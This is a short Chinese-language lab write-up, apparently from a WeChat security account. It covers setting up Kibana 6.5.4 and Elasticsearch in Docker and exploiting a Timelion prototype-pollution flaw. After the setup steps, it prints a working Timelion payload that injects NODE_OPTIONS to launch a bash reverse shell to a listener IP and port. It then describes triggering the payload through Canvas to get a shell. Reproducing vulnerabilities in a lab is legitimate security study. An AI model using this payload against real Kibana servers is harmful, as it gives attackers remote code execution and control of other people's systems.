更多內容,歡迎關注微信公眾號:信Yang安全,期待與您相遇。
使用docker快速部署環境
docker pull kibana:6.5.4
docker pull elasticsearch:6.5.4
docker run -d --name elasticsearchnew -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4
docker run -d -p 5601:5601 --link elasticsearchnew -e "ELASTICSEARCH_URL=http://192.168.35.185:9200" kibana:6.5.4
參數簡單介紹下
-p: 代表指定的宿主機的端口和容器端口的映射 -d: 代表啟動該容器后的進程為守護進程的方式運行 -e: 代表設置容器變量
注意 這里其實有個坑 如果你的瀏覽器訪問后出現如下圖
那么你是需要確定下 你的kibana與elasticsearch版本是否一致
后面還有個坑 可能是我瀏覽器緩存的問題 如下圖 同樣的地址 左側瀏覽器正常訪問 右側卻出現錯誤?
大約十分鍾后我再次刷新 右側瀏覽器已經恢復正常
開始利用 點擊timelion 輸入如下語句
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.35.1/1021 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
點下右下角的按鈕 然后開始監聽下端口 回到頁面 點擊canvas模塊成功觸發漏洞 成功反彈shell
更多內容,歡迎關注微信公眾號:信Yang安全,期待與您相遇。